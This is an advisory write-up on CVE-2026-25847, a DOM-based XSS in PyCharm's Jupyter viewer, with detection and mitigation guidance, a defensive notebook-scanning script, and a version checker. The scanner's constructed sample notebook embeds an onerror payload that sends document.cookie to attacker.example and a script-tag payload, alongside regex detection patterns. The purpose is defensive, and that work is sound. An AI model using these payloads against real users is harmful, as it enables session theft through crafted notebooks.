CVE-2026-25847 Overview
A DOM-based cross-site scripting (XSS) vulnerability has been identified in JetBrains PyCharm versions prior to 2025.3.2. The flaw is in the Jupyter viewer page: content taken from a notebook is written into the viewer's document without adequate neutralization, so an attacker who gets a user to open a crafted Jupyter notebook can execute arbitrary JavaScript in the viewer's browser context.
Critical Impact
Script that runs inside the viewer runs with whatever the viewer page can reach: it can read data the page exposes, issue requests from the developer's workstation, and alter what the developer sees in the rendered notebook. The public advisory does not detail what the viewer page exposes to script, so treat a crafted notebook as able to do anything the viewer itself can do.
Affected Products
- JetBrains PyCharm versions before 2025.3.2, in any distribution that includes the Jupyter viewer
- Fixed in PyCharm 2025.3.2 and later
Discovery Timeline
- 2026-02-09 - CVE-2026-25847 published to NVD
- 2026-02-09 - Last updated in NVD database
Technical Details for CVE-2026-25847
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a DOM-based XSS variant. The flaw resides in PyCharm's Jupyter viewer component, which renders Jupyter notebook content without adequate sanitization of user-controlled data before inserting it into the Document Object Model.
DOM-based XSS differs from reflected or stored XSS in where the unsafe write happens: no server reflects the payload back to the browser. Instead, the viewer's own client-side JavaScript takes data from the notebook and writes it into the page through an unsafe sink (for example, assigning attacker-controlled markup as HTML instead of text). Here the notebook file is the untrusted input and the viewer's rendering code is the vulnerable client-side code, so the payload executes the moment the notebook is rendered.
The attack requires user interaction, as the victim must open or view a crafted Jupyter notebook file. However, given that developers frequently open notebooks from various sources including public repositories and shared projects, the attack surface is substantial in real-world development workflows.
Root Cause
The root cause stems from insufficient input validation and output encoding within PyCharm's Jupyter viewer rendering pipeline. When processing Jupyter notebook cells, particularly those containing HTML or Markdown content, the viewer fails to properly sanitize or escape potentially dangerous JavaScript constructs before they are rendered in the DOM.
Specifically, the viewer appears to trust certain fields of the notebook JSON: cell outputs carrying HTML or script MIME types, Markdown cell source, and metadata or other fields that are rendered as HTML. The public advisory does not say exactly which fields are affected, so until a notebook is reviewed, every HTML-rendered field in it should be treated as a potential injection point.
Attack Vector
In CVSS terms the attack vector is network: the attacker crafts a malicious Jupyter notebook file (.ipynb), delivers it over the network and convinces a victim to open it in PyCharm. Attack scenarios include:
- Supply Chain Attack: Embedding malicious content in a public Jupyter notebook repository
- Phishing: Sending crafted notebook files via email or collaboration platforms
- Compromised Project: Injecting malicious notebooks into shared development projects
The vulnerability exploits the trust the IDE places in notebook content. When the PyCharm Jupyter viewer processes notebook data containing embedded script tags or JavaScript event handlers in cell outputs, Markdown source or metadata, that code executes in the viewer's DOM context, from where it can read whatever the viewer page exposes, including workspace information shown in the page, and stage further actions. Detailed technical information about the vulnerability can be found in the JetBrains Fixed Issues Overview.
Detection Methods for CVE-2026-25847
Indicators of Compromise
- Script tags, inline event handlers (onerror=, onload=, and similar), javascript: URLs or iframe/object elements in the text/html outputs, application/javascript outputs, Markdown source or metadata of an .ipynb file; all of these are visible in the raw JSON without opening the notebook
- Obfuscated or encoded JavaScript (long base64 or escaped strings) inside cell outputs or metadata, where a legitimate notebook would carry plain output
- Unexpected outbound connections from the PyCharm process, or from the helper processes it spawns for embedded browser content, while a notebook is open
- Notebooks from untrusted sources that arrive with saved rich outputs rather than outputs produced by running the code locally
Detection Strategies
- Monitor file system access for .ipynb files from untrusted sources being opened in PyCharm
- Treat any notebook from outside the organization that carries text/html or application/javascript outputs as suspect; content security policy is a vendor-side control for the embedded viewer and is not something users can configure in the IDE
- Deploy endpoint detection rules that flag unusual PyCharm process behavior during notebook operations
- Scan incoming Jupyter notebook files for suspicious HTML/JavaScript patterns before opening
Monitoring Recommendations
- Enable debug logging for the Jupyter plugin categories (Help > Diagnostic Tools > Debug Log Settings in the IDE) and retain idea.log so viewer activity can be reconstructed after the fact
- Monitor network traffic from development workstations for unexpected outbound connections during IDE usage
- Implement file integrity monitoring for workspace directories containing Jupyter notebooks
- Track PyCharm version information across the organization to identify unpatched installations
How to Mitigate CVE-2026-25847
Immediate Actions Required
- Upgrade JetBrains PyCharm to version 2025.3.2 or later immediately
- Audit any recently opened Jupyter notebooks from untrusted sources for suspicious content
- Review PyCharm's Jupyter viewer settings and, where the IDE offers it, disable automatic rendering of rich (HTML/JavaScript) output
- Implement organizational policies restricting the opening of notebooks from unverified sources
Patch Information
JetBrains has addressed this vulnerability in PyCharm version 2025.3.2. The fix implements proper sanitization of content rendered within the Jupyter viewer, preventing the execution of injected JavaScript code. Users should update to this version or later through the JetBrains Toolbox or by downloading directly from the official JetBrains website. For complete details on the security fix, refer to the JetBrains Fixed Issues Overview.
Workarounds
- Avoid opening Jupyter notebooks from untrusted or unknown sources until the patch is applied
- Use alternative Jupyter viewers (browser-based JupyterLab or Jupyter Notebook) for reviewing untrusted content; note that these render rich output too and rely on their own notebook-trust and sanitization model for untrusted files, so they reduce exposure rather than sandbox the content
- Manually inspect .ipynb files in a text editor before opening them in PyCharm to check for suspicious JavaScript
- Implement network segmentation to limit potential impact if exploitation occurs on development workstations
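The checks described under Root Cause and in the scanning and manual-inspection workarounds above can be automated. The following script is an added example written for this write-up, not JetBrains code and not the fix: it walks the public nbformat v4 layout (cells with a source, outputs carrying MIME-keyed data, free-form metadata), flags the active-content markers named above, and can strip active MIME outputs so a notebook can be opened with less exposure. The sample notebook and the attacker.example host inside it are constructed for the demonstration.

```python
"""Scan a Jupyter notebook (.ipynb) for content an HTML-rendering viewer would
execute. Added example, not JetBrains code: follows the public nbformat v4
layout; SAMPLE_NOTEBOOK below is constructed to exercise the checks."""
import copy
import json
import re
import sys
from typing import Iterator

# MIME types a rich viewer renders as markup or runs as script. text/plain
# output is never active content, so it is left alone everywhere below.
ACTIVE_MIME_TYPES = ("text/html", "application/javascript",
                     "text/javascript", "image/svg+xml")

# Active-content markers inside HTML, Markdown or SVG text. The event-handler
# pattern only fires inside a tag, so prose such as "one = 1" is not flagged.
SUSPICIOUS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I),
    "javascript_url": re.compile(r"(?:href|src|action)\s*=\s*['\"]?\s*javascript:", re.I),
    "iframe_or_object": re.compile(r"<\s*(?:iframe|object|embed)\b", re.I),
    "srcdoc": re.compile(r"\bsrcdoc\s*=", re.I),
}

def _as_text(value) -> str:
    """nbformat stores source and MIME payloads as a string or a list of strings."""
    if isinstance(value, list):
        return "".join(str(v) for v in value)
    return "" if value is None else str(value)

def _walk_strings(obj, path: str) -> Iterator[tuple[str, str]]:
    """Yield (json_path, string) for every string nested anywhere in obj."""
    if isinstance(obj, str):
        yield path, obj
    elif isinstance(obj, dict):
        for key, val in obj.items():
            yield from _walk_strings(val, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, val in enumerate(obj):
            yield from _walk_strings(val, f"{path}[{i}]")

def _findings_in_text(location: str, text: str) -> Iterator[tuple[str, str]]:
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        if pattern.search(text):
            yield location, name

def scan_notebook(nb: dict) -> list[tuple[str, str]]:
    """Return (location, finding) pairs for Markdown/raw sources, active MIME
    outputs and metadata strings that carry executable content."""
    findings: list[tuple[str, str]] = []
    for idx, cell in enumerate(nb.get("cells", [])):
        if cell.get("cell_type") in ("markdown", "raw"):
            findings.extend(_findings_in_text(f"cell[{idx}].source",
                                              _as_text(cell.get("source"))))
        for oidx, out in enumerate(cell.get("outputs") or []):
            for mime, payload in (out.get("data") or {}).items():
                if mime not in ACTIVE_MIME_TYPES:
                    continue
                loc = f"cell[{idx}].outputs[{oidx}].{mime}"
                if mime.endswith("javascript"):
                    findings.append((loc, "javascript_mime_output"))  # executable by definition
                findings.extend(_findings_in_text(loc, _as_text(payload)))
        for path, text in _walk_strings(cell.get("metadata", {}), f"cell[{idx}].metadata"):
            findings.extend(_findings_in_text(path, text))
    for path, text in _walk_strings(nb.get("metadata", {}), "metadata"):
        findings.extend(_findings_in_text(path, text))
    return findings

def neutralize_notebook(nb: dict) -> dict:
    """Copy with active MIME outputs removed; text/plain and image outputs stay.
    Markdown source is left untouched and must be reviewed by hand, which is
    why the sample still yields one finding after neutralization."""
    safe = copy.deepcopy(nb)
    for cell in safe.get("cells", []):
        for out in cell.get("outputs") or []:
            data = out.get("data")
            if isinstance(data, dict):
                for mime in [m for m in data if m in ACTIVE_MIME_TYPES]:
                    del data[mime]
    return safe

# Constructed sample: a Markdown cell with an event handler, a saved text/html
# output carrying a script tag, and a clean execute_result.
SAMPLE_NOTEBOOK = {
    "nbformat": 4, "nbformat_minor": 5,
    "metadata": {"kernelspec": {"name": "python3", "display_name": "Python 3"}},
    "cells": [
        {"cell_type": "markdown", "metadata": {}, "source": ["# Results\n",
         "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">\n"]},
        {"cell_type": "code", "execution_count": 1, "metadata": {}, "source": ["display(HTML(html))"],
         "outputs": [{"output_type": "display_data", "metadata": {},
                      "data": {"text/plain": ["<IPython.core.display.HTML object>"],
                               "text/html": ["<div>ok</div><script>alert(document.domain)</script>"]}}]},
        {"cell_type": "code", "execution_count": 2, "metadata": {}, "source": ["1 + 1"],
         "outputs": [{"output_type": "execute_result", "execution_count": 2, "metadata": {},
                      "data": {"text/plain": ["2"]}}]},
    ],
}

if __name__ == "__main__":
    nb = json.load(open(sys.argv[1], encoding="utf-8")) if len(sys.argv) > 1 else SAMPLE_NOTEBOOK
    for location, finding in scan_notebook(nb):
        print(f"{location}: {finding}")
```

Run it as `python scan_ipynb.py untrusted.ipynb` before opening a file; with no argument it scans the constructed sample and reports the Markdown event handler and the script tag in the saved HTML output. The patterns are a triage aid, not a proof of safety: an attacker who knows the viewer's HTML parser can encode markers the regexes miss, so a clean scan lowers suspicion but does not replace the patch.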
# Verify PyCharm version and check for updates
# Navigate to Help > About in PyCharm to verify version is 2025.3.2 or later
# Or check via JetBrains Toolbox for available updates
# For organizations using silent deployment, update can be scripted:
# Download latest PyCharm from https://www.jetbrains.com/pycharm/download/
# Verify SHA-256 checksum against published values before deployment
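For the version check above and for the fleet-wide version tracking recommended under Monitoring, the following script is an added example for this write-up, not JetBrains tooling. It assumes the product-info.json file that JetBrains IDE distributions place in the install root carries a "version" string, compares it against the fixed release, and handles version strings with a missing patch component (2025.3 is older than 2025.3.2) or a suffix such as an RC tag. The two install directories it writes are constructed for the demonstration.

```python
"""Check whether a PyCharm install is at or past the release that fixes
CVE-2026-25847. Added example, not JetBrains tooling: reads the
product-info.json JetBrains IDE distributions ship in the install root
(assumed to carry a "version" string); demo() writes constructed files."""
import json
import re
import tempfile
from pathlib import Path

FIXED_VERSION = "2025.3.2"

def parse_version(version: str) -> tuple[int, int, int]:
    """Map '2025.3.1', '2025.3' or '2025.3.2 RC' onto a comparable
    (year, major, patch) tuple; a missing patch component counts as 0,
    so '2025.3' sorts below '2025.3.2'."""
    match = re.match(r"\s*(\d+)(?:\.(\d+))?(?:\.(\d+))?", version)
    if not match:
        raise ValueError(f"unrecognised version string: {version!r}")
    year, major, patch = (int(p) if p else 0 for p in match.groups())
    return year, major, patch

def is_patched(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version is the fixed release or later."""
    return parse_version(version) >= parse_version(fixed)

def check_install(install_dir: Path) -> tuple[str, bool]:
    """Return (version, patched) for one install root."""
    info = json.loads((install_dir / "product-info.json").read_text(encoding="utf-8"))
    return info["version"], is_patched(info["version"])

def unpatched_installs(install_dirs: list[Path]) -> list[tuple[Path, str]]:
    """Fleet view: every install root whose version is below the fix."""
    stale = []
    for install_dir in install_dirs:
        version, ok = check_install(install_dir)
        if not ok:
            stale.append((install_dir, version))
    return stale

def demo() -> list[tuple[str, str, bool]]:
    """Write two constructed product-info.json files and check both."""
    results = []
    with tempfile.TemporaryDirectory() as tmp:
        for name, version in (("pycharm-old", "2025.3.1"), ("pycharm-new", "2025.3.2")):
            root = Path(tmp) / name
            root.mkdir()
            (root / "product-info.json").write_text(
                json.dumps({"name": "PyCharm", "version": version}), encoding="utf-8")
            found, ok = check_install(root)
            results.append((name, found, ok))
    return results

if __name__ == "__main__":
    for name, version, ok in demo():
        print(f"{name}: {version} -> {'patched' if ok else 'UPDATE REQUIRED'}")
```

Point `unpatched_installs` at the install roots your deployment tooling knows about (for example the directories JetBrains Toolbox manages per user) to list the machines that still need the update; the same version comparison works for a version string collected by an endpoint agent.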
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


